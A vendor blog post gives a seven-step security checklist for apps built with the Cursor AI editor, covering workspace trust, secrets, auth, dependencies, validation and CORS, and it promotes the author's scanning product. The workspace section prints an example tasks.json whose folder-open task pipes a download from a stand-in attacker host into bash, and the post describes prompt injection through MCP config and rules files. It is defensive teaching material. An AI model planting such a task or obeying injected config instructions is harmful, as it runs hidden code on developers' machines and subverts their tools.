
Cursor security checklist: The 7-step guide to secure the app you just built with Cursor.

Mr. Ballaz
April 17, 2026 · 6 min read

Focus: Checklist
Risk: High
Stack: Cursor
Detection: Ubserve Runtime Simulation

[Image: Security checklist interface for Cursor apps before production release.]

Cursor builds working code, not secure code. Use this 7-step checklist to fix Workspace Trust, leaked secrets, broken auth, and dependency risks before every deploy.

Cursor's Workspace Trust is disabled by default. A hidden runOn: folderOpen task can exfiltrate your .env before you finish your coffee.

A Cursor security checklist covers the seven areas AI coding tools consistently break: Workspace Trust configuration, secrets in chat history, auth logic after refactors, database tenant scoping, dependency integrity, input validation, and API hardening. Running this before every deploy closes the gap between code that works and code that is safe to ship.

Cursor's job is to make code run — not to make it secure. Before every production deploy, verify that Workspace Trust is enabled, no secrets touched agent chat history, auth middleware is still intact after refactors, and all generated npm packages are legitimate. AI coding tools like Cursor introduce a specific class of vulnerabilities that manual review alone misses: hidden task execution, prompt injection via config files, and authorization logic silently simplified out of existence.

Key Security Risks in Cursor-Built Apps

Workspace Trust bypass: Cursor inherits VS Code's Workspace Trust model, but it is effectively bypassed in rushed workflows. A malicious runOn: folderOpen task in .vscode/tasks.json executes the moment you open a cloned repo — before you read a single line of code.

Prompt injection via MCP config: .cursor/mcp.json controls which tools your AI agent can access. A file write to this path can redirect agent behavior, exfiltrate context, or execute arbitrary tool calls silently.

Typosquatted packages: Cursor suggests and installs npm packages by name. AI models have a known failure mode of suggesting plausible-sounding packages that do not exist — and attackers register those names with malicious payloads.

Auth logic simplification: When you ask Cursor to refactor authentication code, it frequently removes token expiry checks, session validation, or middleware guards because they add complexity. The app still works in testing. The security model is gone.

Secret leakage via chat: Any key pasted into Cursor chat persists in agent context. It can appear in generated code comments, logs, and suggestions. Treat every chat session as a potential secret exposure event.

What Cursor doesn't tell you by default

  • Workspace Trust can be bypassed in rushed workflows, letting malicious task files execute on repo open.
  • AI output regularly includes unvetted npm packages, including typosquatted packages with malicious payloads.
  • Prompt-injection chains can overwrite `.cursor/mcp.json` and redirect agent behavior entirely.
  • Pasting API tokens into chat creates long-lived secret leakage risk outside your repo controls.
  • Auth refactors silently remove security checks that made the flow complex to the AI model.

Workspace & IDE Security

The first Cursor security risk starts before you write a line of code.

  • Enable Workspace Trust in VS Code settings and never auto-trust unknown repos.
  • Inspect .vscode/tasks.json before running anything — look for runOn: folderOpen entries.
  • Review .cursor/mcp.json for tool definitions you did not add yourself.
  • Never open repos from unknown sources without reviewing their config files first.
  • Audit .cursorrules files for instructions that override your intended security behavior.

// Red flag in .vscode/tasks.json — executes before you read any code
{
  "version": "2.0.0",
  "tasks": [{
    "label": "setup",
    "type": "shell",
    "command": "curl attacker.com/payload | bash",
    "runOptions": { "runOn": "folderOpen" }
  }]
}

Secrets & Environment Variables

  • Never paste cloud keys, JWT secrets, Stripe keys, or database URLs into Cursor chat.
  • Move all runtime secrets to your hosting provider's secret store — not .env files committed to git.
  • Search generated code for sk-, service_role, sk_live_, and OPENAI_API_KEY before every push.
  • Add pre-commit secret scanning with gitleaks or trufflehog to catch what code review misses.
  • Rotate any key that appeared in a Cursor prompt, a code suggestion, or a debug snippet.

# Scan before every commit
gitleaks detect --source . --verbose

Authentication & Route Protection

Cursor's biggest security blind spot is auth. Every refactor is a potential regression.

  • Re-verify every auth guard after agent-assisted edits — especially middleware and route-level checks.
  • Confirm token expiry, issuer validation, and audience checks still execute after any refactor.
  • Add explicit tests for horizontal access: user A must not be able to read or modify user B's records.
  • Block fallback "allow" branches that Cursor introduces for convenience.
  • Test with expired tokens, forged tokens, and missing auth headers — not just the happy path.

import { NextRequest, NextResponse } from 'next/server';
import { getSession } from './lib/session'; // your session helper (assumed path)

// What Cursor often generates — no expiry check
export async function middleware(req: NextRequest) {
  const session = await getSession(req);
  if (!session) return NextResponse.redirect(new URL('/login', req.url));
  return NextResponse.next(); // ← passes with expired session
}

// What you need
export async function middleware(req: NextRequest) {
  const session = await getSession(req);
  // A missing, malformed, or expired session is treated the same way: redirect, never fall through.
  if (!session || typeof session.expiresAt !== 'number' || session.expiresAt < Date.now()) {
    return NextResponse.redirect(new URL('/login', req.url));
  }
  return NextResponse.next();
}

Database & Storage Security

  • Verify tenant scoping in every query generated during Cursor-assisted refactors.
  • Enforce least-privilege DB users for migrations, background jobs, and app runtime — not one shared credential.
  • Confirm storage objects require signed access and ownership checks, not just filename obscurity.
  • Audit ORM changes for removed where user_id = session.user_id clauses after agent edits.
  • Enable RLS on all Supabase tables containing user or business data and verify policies after every migration.

Dependency Security

  • Review every npm install Cursor suggests — confirm the package name, author, and download count before running.
  • Run npm audit after any agent-assisted dependency change.
  • Lock package versions and audit the diff in package-lock.json before merging agent branches.
  • Watch for typosquatting: lodash vs lodahs, axios vs axois, express vs expres.

# After any agent-suggested install
npm audit
npx npm-check-updates

Input Validation & XSS

  • Add strict schema validation with Zod or Valibot on every write endpoint Cursor generated.
  • Escape rich-text and markdown content before rendering user-generated output in React.
  • Reject unknown fields in API payloads — Cursor-generated APIs often accept everything by default.
  • Test reflected and stored XSS in all AI-generated form flows, comment fields, and profile inputs.

import express from 'express';
import { z } from 'zod';

const app = express();
app.use(express.json()); // `db` below is your data-access layer (assumed)

// Cursor often generates this — no validation
app.post('/api/comment', async (req, res) => {
  await db.insert('comments', req.body); // whatever the client sent goes straight to the database
});

// What you need
const CommentSchema = z.object({
  content: z.string().min(1).max(1000),
  postId: z.string().uuid(),
}).strict(); // reject unknown fields instead of silently accepting them

app.post('/api/comment', async (req, res) => {
  const parsed = CommentSchema.safeParse(req.body);
  if (!parsed.success) {
    return res.status(400).json({ errors: parsed.error.flatten().fieldErrors });
  }
  await db.insert('comments', parsed.data);
  res.status(201).end();
});

CORS, Rate Limiting & API Hardening

  • Set explicit Access-Control-Allow-Origin allowlists per environment — never wildcard in production.
  • Disable wildcard CORS on any route that touches private data or user records.
  • Enforce SameSite=Strict, HttpOnly, and Secure on all session cookies.
  • Add IP and user-based rate limits on login, password reset, OTP, and token refresh routes.
  • Protect expensive AI proxy routes and data export endpoints with burst caps.
  • Return 429 with Retry-After headers and log sustained abuse spikes for investigation.

Cursor is commonly used alongside Windsurf or for Supabase-backed apps. After completing this checklist, review the Windsurf security checklist for multi-file Cascade refactor risks and the Supabase security checklist if your app uses Supabase. For a full cross-tool pre-launch sweep, see the pre-deploy security checklist for vibe-coded apps.

Run Your Security Audit

If running this checklist manually sounds like a lot — it is. That is why we built Ubserve.

Ubserve scans your real codebase for every class of vulnerability on this checklist: exposed secrets, broken auth, missing RLS, weak CORS, and Cursor-specific security gaps. Every finding comes with a plain-English explanation and a fix prompt you paste directly back into Cursor to patch it immediately.

If you worked through this carefully, you are already ahead of most teams shipping with AI. Most incidents are not dramatic. They are small gaps nobody fixed, stacked on top of each other, by a founder who trusted their AI too much.

Run the audit. Fix what it flags. Ship with confidence.

— Mr. Ballaz, Founder of Ubserve

FAQs

How do I secure a Cursor app before production?
Enable Workspace Trust, remove all hardcoded secrets from code and chat history, verify auth middleware is intact after every agent session, and run an automated security scan before deploy.

What are the most common Cursor security vulnerabilities in 2026?
Hidden folderOpen tasks that run on repo open, prompt-injected MCP config overwrites, typosquatted npm packages in AI-generated installs, and auth checks silently removed during refactors.

Is Cursor safe for production app development?
Cursor is a powerful development tool, but it generates code that works before it generates code that is secure. Every agent-assisted session needs a security review pass before shipping.

What should I audit after a big Cursor refactor?
Recheck auth middleware, token expiry checks, sensitive env variable access, and all dependency changes. Cursor frequently simplifies auth logic in ways that remove security checks.

Can Cursor expose my API keys?
Yes. Pasting tokens into Cursor chat creates persistent exposure risk. Keys pasted into agent context can appear in logs, suggestions, and generated code. Always rotate any key that touched a chat session.

How do I check if Cursor introduced a security vulnerability?
Run Ubserve after every major agent session. It scans for exposed keys, broken auth, missing RLS, and other Cursor-pattern vulnerabilities and gives you fix prompts to paste back into Cursor.